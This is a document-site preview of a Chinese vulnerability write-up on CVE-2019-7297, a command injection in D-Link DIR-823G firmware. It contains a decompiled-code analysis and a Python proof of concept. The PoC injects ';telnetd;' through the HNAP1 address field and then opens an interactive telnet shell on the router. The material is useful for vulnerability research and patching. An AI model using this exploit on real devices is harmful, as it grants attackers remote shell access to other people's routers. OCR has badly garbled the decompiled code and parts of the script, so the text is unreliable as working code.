（CVE-2019-7297）D-Link DIR-823G 命令注入漏洞.docx

上传人：王**

文档编号：497121

上传时间：2023-09-21

格式：DOCX

页数：4

大小：39.34KB

《（CVE-2019-7297）D-Link DIR-823G 命令注入漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2019-7297）D-Link DIR-823G 命令注入漏洞.docx（4页珍藏版）》请在优知文库上搜索。

1、(CVE-2019-7297) D-Link DIR-823G 命令注入漏洞一、漏洞简介D-Link DIR 823G 1.02B03及之前的版本中存在命令注入漏洞，攻击者可通过发送带有shell元字符的特制/HNAPl请求利用该漏洞执行任意的操作系统命令。GetNetworkTomographyResult函数中调用system函数，执行的内容中包括不受信任的用户输入AddreSS字段，攻击者可以远程执行任意命令。二、漏洞影响D-Link DIR 823G 1.02B03 及之前的版本三、复现过程漏洞分析漏洞原理中提到的GetNetworkTOniographyResult函数是在goa

2、head二进制文件中实现的。在FunctionJist中找到对应而函数地址。GetNetWOrkTOmOgraPhyReSUIt 获取 address, number, SiZe 参数，作为 Ping 的参数。,rr . ajub_get (puts Cerror, pmb get MIBePINGeNUMBEK);)else (strcat(acStack2S2r* -c w);prlntf(char )$ ,：-Qd -v drnuxer trlen(char )，9Wic ；-, (char ) 4.,Varl psabs9ec(0xU749size);if (Varl - O) p

3、ut.sC,error, epoxb get MIB_PIHG_5XZf); ) else (9trcAtft: tac-: rw -9 );sprlntf(char )_二JW.e:工20);_n *rlen(char )loc1_120);trac4t( ： 3 r (car )t._： ,_:,“9trct tappng.tx 2txppng.tx);Puts(AcStazaJIfiC);syaten(- :Sta：c2eo);_3tr*ar - fopen(auppng.txt*v rIf (_itreax 0x0)(puts(tppng.tMt is NULL)：ping addre

4、ss -c number -w number -s size tmpping.txt 2tmpping.t t但在system之前并没有对这些外来参数进行检查，如果address为;telnetd;就能启动Telnet服务。可以看出这些参数都是通过apmib_get获取的，那么在之前一定有apmib_set进行设置，在IDA中查找关键字0xlb72, 0xlb73, 0xlb73, 定位到apmib_set的位置，结合ghidra的反汇编代码，确定在 SetNetworkTomographySettings函数中可以对这些参数进行设置。,4tl H*lLoS3%rin9(0tlFnC. ?

5、pocimport requests from pwn import *IP=192.168.0.1, headers = requests. utils. default_headers()headersUser- Agent = ,Mozilla5.0 (Windows NT 10.0; Win64; 64) Appl eWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 headersSOAPAction = , raphySettingsheaders,Content-Type = tetml; Cha

6、rset=UTF-8headersAccept=*/*headersAccept-Encoding=gzip, deflateheaders Accept-Language =,zh-CNj zh;q=0.9,en;q=0.8 payload = jtelnetd;44,r = requests.post(,http:/+IP+HNAP1,i headers=headers data=payload) print r.textheadersSOAPAction = ,http:/ZHNAPlGetNetworkTomog raphyResult,payload = r = requests.post(http:/,+IP+HNAP1,i headers=headersj data=payload) print r.text p=remote(IP,23) p.interactive(

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

3 金币 0人已下载

下载	加入VIP,免费下载

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: CVE-2019-7297D-Link DIR-823G 命令注入漏洞 CVE 2019 7297 Link DIR 823 命令注入漏洞

优知文库所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

关于本文

本文标题：（CVE-2019-7297）D-Link DIR-823G 命令注入漏洞.docx
链接地址：https://www.yzwku.com/doc/497121.html